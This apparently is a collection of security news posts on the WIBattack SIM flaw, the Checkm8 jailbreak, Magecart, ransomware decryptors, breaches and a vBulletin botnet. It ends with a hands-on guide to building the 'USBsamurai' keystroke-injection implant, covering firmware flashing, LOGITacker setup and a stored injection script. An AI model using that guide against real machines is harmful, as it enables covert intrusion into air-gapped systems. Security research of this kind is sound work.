By sending a malicious SMS to victim phone number, attacker can abuse the vulnerabilities in the WIB sim browser to remotely take control of the victim mobile phone to perform harmful actions such as: send sms, make phone call, get victim’s location, launch other browsers (e.g WAP browser), get victim’s IMEI, etc.”

The researcher also claimed to have discovered the flaw in S@T Browser and disclosed a video PoC of the Simjacker with details that have not yet been published by AdaptiveMobile Security researchers.

The flaw in both S@T and WIB Browsers can be exploited to perform several malicious tasks by sending an SMS containing a spyware-like code.

Back to the WIBattack, the WIB toolkit was created by SmartTrust, a company that provides SIM toolkit-based browsing solutions hundreds of mobile operators worldwide, including AT&T, Etisalat, KPN, TMobile, Telenor, and Vodafone.

Like the S@T Browser, WIB toolkit has also been designed to allow mobile carriers to provide some essential services, subscriptions, and value-added services over-the-air to the customers. It also allows changing core network settings on their devices.

“OTA is based on client/server architecture where at one end there is an operator back-end system (customer care, billing system, application server…) and at the other end there is a SIM card,” continues the researcher.

The flaw in the WIB toolkit could be exploited to:

  • Retrieve the target device’ location and IMEI
  • Send fake messages on behalf of victims,
  • Distribute malware by launching victim’s phone browser and visiting a malicious web page
  • dial premium-rate numbers
  • Call the attacker’s phone number to spy on victims’ surroundings via the device’s microphone
  • Perform denial of service attacks by disabling the SIM card
  • Retrieving target device info (i.e language, radio type, battery level, etc.)

Below the attack scenario described by the expert:

WIBAttack

(1) Attacker sends a malicious OTA SMS to the victim phone number. The OTA SMS contains WIB command such as: SETUP CALL, SEND SMS, PROVIDE LOCATION INFO, etc.

(2) Right after receiving the OTA SMS, Baseband Operating System of the victim mobile phone uses ENVELOP COMMAND ( an APDU command to communicate between mobile phone and simcard) to forward the TPDU of the OTA SMS to WIB browser in victim’s simcard. Different from the procedure of receiving the normal text sms, the procedure OTA SMS is silently handled just in baseband operating system and does not raise any alert to application operating system (android os, ios, blackberry os, …). Neither feature phone nor smart phone raises alert about the procedure of ota sms: no ringing, no vibration, no detection from users.

(3) WIB browser follows the WIB commands inside the TPDU of OTA SMS and sends the corresponding PROACTIVE COMMAND to the victim mobile phone such as: SETUP CALL, SEND SMS, PROVIDE LOCATION INFO.

(4) The victim mobile phone follows the PROACTIVE COMMAND received from victim’s simcard to perform the corresponding actions such as: make a phone call, send an sms to whatever phone number attacker wants (e.g receiver mobile phone in the figure).

The researcher published a video PoC of the attack:

Lakatos shared his findings on WIBAttack with the GSM Association (GSMA).
Summarizing, at least two hacking techniques leverage vulnerabilities in one of the components of most of the mobile SIM cards of the market potentially exposing billions of mobile users at attacks.

The researcher announced that is working on a mobile phone app that would allow users to scan their SIM cards to determine if they are vulnerable to the Simjacker attack.

The researchers at SRLabs also developed an Android app, named SnoopSnitch, that can detect Simjacker-like attacks. The SnoopSnitch app only runs on rooted Android mobile phones with a Qualcomm chipset.

“The SnoopSnitch Android app warns users about binary SMS attacks including Simjacker since 2014. (Attack alerting requires a rooted Android phone with Qualcomm chipset.)” reported SRLLabs.

Pierluigi Paganini

(SecurityAffairs – WIBattack, hacking)

The post After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk appeared first on Security Affairs.

Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips

A security expert has released a new jailbreak, dubbed Checkm8, that impacts all iOS devices running on A5 to A11 chipsets, it works on iPhone models from 4S to 8 and X.

The security expert Axi0mX has released a new jailbreak, dubbed Checkm8, that works on all iOS devices running on A5 to A11 chipsets. The jailbreak works with all Apple products released between 2011 and 2017, including iPhone models from 4S to 8 and X.

Checkm8 leverages vulnerabilities in the Apple Bootrom (secure boot ROM) to achieve full control over their device.

“The bootrom (called “SecureROM” by Apple) is the first significant code that runs on an iDevice. The bootrom is read-only. Finding exploits in the bootrom level is a big achievement since Apple won’t be able to fix it without a hardware revision.” reads a description for the BootRom.

The expert who devised the Checkm8 jailbreak described it as “a permanent unpatchable bootrom exploit,” anyway it is essential to highlight that the exploit could lead to a jailbreak by chaining it with other flaws.

Bootrom jailbreaks are very dangerous because they are permanent and can’t be addressed via software, in order to patch a Bootrom flaw it is necessary to physical modify the chipsets.

Axi0mX’s jailbreak code is marked as a “beta” release, but there is the concrete possibility that experts coders or intelligence agencies will integrate it in hacking tools and malware.

“What I am releasing today is not a full jailbreak with Cydia, just an exploit. Researchers and developers can use it to dump SecureROM, decrypt keybags with AES engine, and demote the device to enable JTAG. You still need additional hardware and software to use JTAG.” wrote the expert.

“Features the exploit allow include:

  • Jailbreak and downgrade iPhone 3GS (new bootrom) with alloc8 untethered bootrom exploit. 🙂
  • Pwned DFU Mode with steaks4uce exploit for S5L8720 devices.
  • Pwned DFU Mode with limera1n exploit for S5L8920/S5L8922 devices.
  • Pwned DFU Mode with SHAtter exploit for S5L8930 devices.
  • Dump SecureROM on S5L8920/S5L8922/S5L8930 devices.
  • Dump NOR on S5L8920 devices.
  • Flash NOR on S5L8920 devices.
  • Encrypt or decrypt hex data on a connected device in pwned DFU Mode using its GID or UID key.

Currently, the jailbreak does not work on Apple’s latest two A12 and A13 chipsets.

Experts pointed out that the jailbreak needs physical access to the device, so and could not be used remotely.

“During iOS 12 betas in summer 2018, Apple patched a critical use-after-free vulnerability in iBoot USB code. This vulnerability can only be triggered over USB and requires physical access. It cannot be exploited remotely. I am sure many researchers have seen that patch.” concludes the expert.

“That’s how I discovered it. It is likely at least a couple other researchers were able to exploit this vulnerability after discovering the patch. The patch is easy to find, but the vulnerability is not trivial to exploit on most devices.”

Pierluigi Paganini

(SecurityAffairs – Checkm8, hacking)

The post Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips appeared first on Security Affairs.

Magecart 5 hacker group targets L7 Routers

IBM researchers observed one of the Magecart groups using a malicious code to inject into commercial-grade layer 7 L7 routers.

IBM X-Force Incident Response and Intelligence Services (IRIS) experts observed that one of the Magecart groups, tracked as MG5, is using malware to inject into commercial-grade L7 routers.

The experts believe the hackers are likely testing malicious code designed for injection into benign JavaScript files loaded by L7 routers that are typically used by airports, casinos, hotels, and resorts. According to IBM, the threat actors are currently targeting users shopping on U.S. and Chinese websites.

The experts discovered that the Magecart hackers are able to inject credit card skimmer into a popular open-source JavaScript library that websites use to ensure wide compatibility with mobile browsing.

we found that MG5 has likely devised an attack scenario in which it could inject its malicious payment card stealing code into a popular open-source JavaScript library. This open-source code is provided as a free, licensed tool designed to help make websites compatible with mobile browsing.” reads the analysis published by IBM.”By infecting that code, MG5 can potentially infect and compromise the data of mobile device users that install booby-trapped apps and then shop online.”

The experts speculate the attackers have prepared code for injection into a specific type of commercial-class L7 router, they pointed out that no vendor compromise has been observed so far.

L7 routers implement both routing and switching capabilities, an attacker that compromises the network devices could potentially perform several malicious activities, such as traffic hijacking.

The router can be installed in the same virtualization server as other business-critical IT infrastructure components, this means that once compromised could be used by hackers for lateral movements.

The Wi-Fi connectivity is usually offered for free in locations such as hotels that prefer to outsource the Wi-Fi service, but most vendors for Wi-Fi service do not support proxying adverts or JavaScript injection.

“Having access to a large number of captive users with very high turnover — such as in the case of airports and hotels — is a lucrative concept for attackers looking to compromise payment data.”continues IBM. “We believe that MG5 aims to find and infect L7 router libraries with malicious code and possibly inject malicious ads that captive users must click on to eventually connect to the internet.”

Attackers can compromise L7 routers to steal guest payment data from the users the browse websites through the compromised network device, they can also inject malicious ads into webpages viewed by all connected guest devices.

IBM experts also believe that the Magecart hackers have infected open-source mobile app code that’s offered to app developers for free.

“Another finding from X-Force IRIS with regards to code being tested by Magecart Group 5 concerns open-source mobile app code that’s offered to app developers for free. The code provides a library-agnostic touch slider to allow developers to build touch galleries for their app projects.” concludes the report.

“MG5 has likely infected this code, corrupting it as its source to ensure that every developer using the slider will end up serving the attackers’ malicious code, leading to the compromise of data belonging to those using the finished product,”.

The report also includes mitigation tips to prevent access to data.

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post Magecart 5 hacker group targets L7 Routers appeared first on Security Affairs.

Emsisoft released a new free decryption tool for the Avest ransomware

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days after the release of WannaCryFake decryptor.

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days ago the researchers also released a free decryptor for the WannaCryFake ransomware.

The Avest ransomware encrypts victim’s files and appends the extension “.ckey().email().pack14” to the filename.

Below the text of the ransom note “!!!Readme!!!Help!!!.txt” that the ransomware drops on the infected systems:

"Problems with your data? Contact us: data1992@protonmail[.]com key: <victim specific>”

The decryption tool could be used by the victims only after they have successfully removed the malware from their system to avoid that the Avest ransomware will repeatedly lock the machine or will encrypt files.

“The decryptor requires access to a file pair consisting of one encrypted file and the original, unencrypted version of the encrypted file to reconstruct the encryption keys needed to decrypt the rest of your data.” reads the user guide published by Emsisoft. “Please do not change the file names of the original and encrypted files, as the decryptor may perform file name comparisons to determine the correct file extension used for encrypted files on your system.”

Victims of the Avest ransomware can download the decryptor tool here:

https://www.emsisoft.com/ransomware-decryption-tools/avest

In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May Emsisoft experts released a free Decrypter tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – Avest ransomware, hacking)

The post Emsisoft released a new free decryption tool for the Avest ransomware appeared first on Security Affairs.

DoorDash Data Breach exposes data of approximately 5 million users

DoorDash is a San Francisco–based on-demand food delivery service, the company confirmed it has suffered a data breach that exposed roughly 5 million users.

DoorDash announced a data breach that exposed the personal information of 4.9 million consumers, Dashers, and merchants.

According to the data breach notification sent to the impacted customers and the security note published on the website, the incident took place on May 4, 2019, when an unauthorized party was able to gain access to user information, Users and merchants who were registered on the platform after April 5, 2018, were not impacted.

“Earlier this month, we became aware of unusual activity involving a third-party service provider. We immediately launched an investigation and outside security experts were engaged to assess what occurred. We were subsequently able to determine that an unauthorized third party accessed some DoorDash user data on May 4, 2019.” reads the security notice published on the website. “Approximately 4.9 million consumers, Dashers, and merchants who joined our platform on or before April 5, 2018, are affected. Users who joined after April 5, 2018 are not affected.

DoorDash

It is not clear how this data was accessed, but they mention that they noticed unusual activity with a third-party service. It is not known if this data was being hosted by a third-party service provider, if they were subject to a supply-chain attack from this service provider, or the unauthorized access originated from this provider.

Exposed data includes profile information, email addresses, delivery addresses, order history, phone numbers, and hashed and salted passwords. The company also confirmed that for some consumers, Dashers, and merchants, the last four digits of their credit cards or bank accounts were exposed.

“However, full credit card information such as full payment card numbers or a CVV was not accessed. The information accessed is not sufficient to make fraudulent charges on your payment card.” highlighted the company.

The incident also resulted in the exposure of roughly 100,000 driver’s license numbers associated the Dashers.

The company added that it doesn’t believe that user passwords have been compromised, but as precautationary measure recommends users to reset their passwords. Users can change their DoorDash password by visiting https://www.doordash.com/accounts/password/reset/.

At the time of writing it is not clear how data were accessed, the company only mentioned an unusual activity involving a third-party service provider. It is not clear if hackers breached the providers to access DoorDash systems or if DoorDash data was managed by this partner.

Pierluigi Paganini

(SecurityAffairs – DoorDash, hacking)

The post DoorDash Data Breach exposes data of approximately 5 million users appeared first on Security Affairs.

Botnet exploits recent vBulletin flaw to protect its bots

Security expert Troy Mursch of Bad Packets reported that a botnet is exploiting the recently disclosed vBulletin exploit to block other attackers from also using it.

The security expert Troy Mursch observed a botnet that it utilizing the recently disclosed vBulletin exploit to secure vulnerable servers to avoid that can be compromised by other threat actors. This technique is not new and allows botmaster to preserve their own botnet.

Early this week, an anonymous security researcher publicly disclosed a zero-day remote code execution flaw, tracked as CVE-2019-16759, in the vBulletin forum software and the exploit code to trigger it.

vbulletin

The vulnerability could be exploited remotely by an unauthenticated attacker. The PoC exploit published by the hacker works on vBulletin versions 5.0.0 till the latest 5.5.4.

The zero-day flaw in the forum software resides in the way an internal widget file of the forum software package accepts configurations via the URL parameters. The expert discovered that the package fails to validate the parameters, an attacker could exploit it to inject commands and remotely execute code on the vulnerable install.

The threat actor behind the botnet uses the exploit to hack into vulnerable servers, then configures them to require a password to execute commands.

The above images show how the attacker modifies the source code in the includes/vb5/frontend/controller/bbcode.php file in order to request a password for the command execution. The above image also shows the password used by the botmaster to protect the systems he had infected, this means that another attacker could use it to send commands to the system.

According to Mursch, most of the attacks come from Brazil, Vietnam, and India.

Chaouki Bekrar, founder and CEO of the Zerodium exploit broker, confirmed that the vBulletin flaws has been privately circulating for years.

“The availability of a working exploit is aggravated by another publicly posted script that uses the Shodan search site to find vulnerable servers. Attackers can use it to generate a list of vBulletin sites that are susceptible and then use the exploit to take them over.” reported Ars Technica.

Pierluigi Paganini

(SecurityAffairs – vBulletin, hacking)

The post Botnet exploits recent vBulletin flaw to protect its bots appeared first on Security Affairs.

iOS 13 Bug Gives Third-Party Keyboards “Full Access” Permissions

This week, Apple released iOS 13 and iPadOS, now a few days later, the company is warning users of an unpatched security flaw in third-party keyboard apps.

Apple has released a security advisory to warn users of an unpatched security bug in iOS 13 that affects third-party keyboard apps. The bug can result in granting keyboard extensions full access, even when users deny it.

Granting keyboard extensions full access could allow developers to capture everything the users type on their devices.

Third-party keyboard extensions in Apple iOS can run without access to external services, or they can request “full access” to provide additional features through network access. Apple announced an upcoming software update to address the issue, the tech giant highlighted that it doesn’t affect Apple’s built-in keyboards.

“Apple has discovered a bug in iOS 13 and iPadOS that can result in keyboard extensions being granted full access even if you haven’t approved this access.” reads the security advisory published by Apple. “This issue does not impact Apple’s built-in keyboards. It also doesn’t impact third-party keyboards that don’t make use of full access. The issue will be fixed soon in an upcoming software update.”

On iOS, third-party keyboard extensions can run entirely standalone without access to external services and thus, are forbidden from storing what you type unless you grant “full access” permissions to enable some additional features through network access.

The bug affects devices running third-party keyboard apps such as popular Gboard, Grammarly, and Swiftkey that request full access to the users.

It should be noted that the iOS 13 bug doesn’t affect Apple’s built-in keyboards or third-party keyboards that don’t make use of full access.

Users can see the installed third-party keyboard apps following these steps:

  1. Open the Settings app.
  2. Go to General > Keyboard > Keyboards.

Users can mitigate this bug by temporarily uninstalling all third-party keyboards from their device.

Pierluigi Paganini

(SecurityAffairs – ios 13, Apple)

The post iOS 13 Bug Gives Third-Party Keyboards “Full Access” Permissions appeared first on Security Affairs.

Study shows connections between 2000 malware samples used by Russian APT groups

A joint research from Intezer and Check Point Research shows connections between nearly 2,000 malware samples developed by Russian APT groups.

A joint research from Intezer and Check Point Research shed light on Russian hacking ecosystem and reveals connections between nearly 2,000 malware samples developed by Russian APT groups.

The report is extremely interesting because gives to the analysts an overview of the Russian hacking community and their operations.

The experts also published an interactive map that gives a full overview of this Russian hacking ecosystem.

Since the first publicly known attacks by Moonlight Maze, in 1996, many Russian hacking groups have emerged in the threat landscape, their operations involved highly sophisticated malware and hacking techniques.

“Russia is known to conduct a wide range of cyber espionage and sabotage operations for the last three decades. Beginning with the first publicly known attacks by Moonlight Maze, in 1996, the Pentagon breach in 2008, Blacking out Kyiv in 2016, hacking the United States elections in 2016, and including some of the largest, most infamous cyberattacks in history, targeting an entire nation with NotPetya ransomware.” states the report.

“This led us to gather, classify, and analyze thousands of Russian APT malware samples in order to find connections not only between samples, but also between different families and actors.”

Russian APT Map

The Russian hacking ecosystem characterized by Russian APT groups is very complex, security firms have collected a huge quantity of information related to single threat actors, but not of them provided a global picture of the ecosystem.

Give a look at the “Russian APT Map,” that illustrates the connections between different Russian APT malware samples, malware families, and threat actors.

Russian APT MAP

Experts analyzed approximately 2,000 samples that were attributed to Russian APT groups, the researchers found 22,000 connections between the samples, in addition to 3.85 million non-unique pieces of code that were shared. The study classified the samples into 60 families and 200 different modules.

“Every actor or organization under the Russain APT umbrella has its own dedicated malware development teams, working for years in parallel on similar malware toolkits and frameworks. Knowing that a lot of these toolkits serve the same purpose, it is possible to spot redundancy in this parallel activity.” continues the report.

“These findings may suggest that Russia is investing a lot of effort into its operational security. By avoiding different organizations re-using the same tools on a wide range of targets, they overcome the risk that one compromised operation will expose other active operations.”

Experts also released a signature-based tool to scan dubbed Russian APT Detector a host or a file against the most commonly re-used pieces of code used by the Russian APT groups in their operations.

Enjoy the report!

Pierluigi Paganini

(SecurityAffairs – Russian APT, hacking)

The post Study shows connections between 2000 malware samples used by Russian APT groups appeared first on Security Affairs.

USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.

The popular researcher Luca Bongiorni described how to make a malicious USB Implant (USBsamurai) that allows bypassing Air-Gapped environments with 10$.

In the previous post, I have talked a bit about USBsamurai based on C-U0007.

With this article I wanna bring more light regarding:

  • Which are the differences between C-U0007 & C-U0012
  • How to Build USBsamurai with a C-U0012
  • How to flash the C-U0012 with the LIGHTSPEED Firmware
  • How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature
  • How to setup LOGITacker

Let’s get started!

Differences between C-U0007 & C-U0012:

As you see below, they quite differ from aesthetic point of view. Moreover, the C-U0007 mounts a Nordic chipset and the C-U0012 a TI chipset. This info will be partially useful when will be matter of picking the best hardware for creating USBsamurai.

image.png

image.png

How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature:

First of all, why do we need to flash the G700 firmware on the C-U0007?

Simple, for keystroke injection, the receiver model matters, as typing speed depends on this. For Unifying receivers (i.e. C-U0007), typing out the Air-gap Bypass Client takes aprox. 2 minutes. Which, despite being typed on a stealthy way, is not optimal.

For Unifying receivers with a Nordic chipset (i.e. C-U0007), this could be reduced to 30 seconds if a G700 firmware is used, but injection is always unencrypted* (meaning everybody else could inject to, as G700 accepts plain injection).

*In case you want more privacy while injecting payloads… I recommend to use the slightly more expensive C-U0012 which has encryption enabled.

How we can improve C-U0007 speed?
You need to buy an old G700 mouse and dump with munifying its firmware and then flash all the C-U0007 you want. Luckily, It happens I have a G700 firmware available HERE🙂 Check below for the detailed instructions.

As for TI receivers (i.e. C-U0008/0012) typing speed could be also reduced to 30 seconds with a LIGHTSPEED firmware. Where do you get the LIGHTSPEED firmware? Either on Logitech’s Github or HERE. But will be discussed in details later on in this article.

How to Build USBsamurai with a C-U00012

IMPORTANT! Before starting be sure you know what you are doing and have all your tools around!

image.png

The process is rather simple:

  • With patience open the USB dongle and extract the PCB with the antenna.
  • Open the USB cable** without destroying it. Use a scalpel to help you.
  • Slightly cut the white plastic of the USB male connector in order to expose its pins.
  • Add flux and solder to those pins and do the same to the pins on the C-U0012.
  • Solder all together ads in the images below. Help yourself with some clamps eventually. Remember they have to be soldered as close as possible to eachother in order to better fit the USB case! Before soldering immediately, check measures!!! DON’T RUSH the first time!

**I recommend trying with this, I built few of USBsamurai with this cable. Is quite easy to open with a scalpel. https://www.aliexpress.com/item/33052091501.html

image.png
image.png
image.png
image.png
image.png

Congrats! Now you have your first USBsamurai based on C-U0012!

How to flash the C-U0012 with the LIGHTSPEED Firmware

Download the firmware either from Logitech’s Github or HERE and use munifying to flash it on the C-U0012 dongle!

image.png
image.png

For LIGHTSPEED, throughput is higher than a normal Unifying firmware, and most importantly the covert channel is Encrypted. Therefore LOGITacker needs to know its encryption key. Which is achieved by pairing the C-U0012 dongle with the LOGITacker itself.

Also remember that if you plan to use an USBsamurai based on C-U0012…LOGITacker needs to run in LIGHTSPEED mode. You can set it with the commands:

image.png

Remember: if instead, you wanna use a C-U0007 with G700 fw, you will have to switch operational mode back to g700:

image.png

How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature

The Flashing procedure is pretty simple:

  • Plug the C-U0007 dongle on the computer.
  • Download the G700 firmware available HERE.
  • Run “sudo ./munifying flash -r [C-U0007_G700]_RQR21.00_B0007_BOT01.02.B0014.bin
  • Done! You are ready to pair your new USBsamurai with LOGITacker!

Reminder: LOGITacker needs to run in G700 mode. You can set it with the commands:

If instead, you wanna use a C-U0012 with LIGHTSPEED fw, you will have to switch your LOGITacker’s operational mode back to LIGHTSPEED:

How to setup LOGITacker

Here we need to split the topic in few points, and I won’t go that deep since there is plenty of documentation in its Github’s repo.

First of all, I assume you already flash the latest release of it in one of the compatible hardware. [In case you are updating to latest release, after flashing it, connect to LOGITacker via serial and do issue erase_flash command. Note that you may loose all your previous scripts and data.]

Working modes (This is mandatory to get everything working properly!!!):

  • For an USBsamurai based on C-U0007 (w/ G700 fw) you need to setup LOGITacker workmode to g700.
  • For an USBsamurai based on C-U0012 (w/ LIGHTSPEED fw) you need to setup LOGITacker workmode to lightspeed.

How to create a script and automatically load at startup:

Simple, connect to LOGITacker over serial and type something as follow.

script press GUI r
script delay 500
script string iexplore -k 
http://fakeupdate.net/wnc/
script delay 200
script press RETURN
script store wannacry

Once saved in the flash, try to load it again.

script load wannacry
script show

The following commands will tell LOGITacker to use this payload as default one for each injection.

options inject default-script wannacry
options store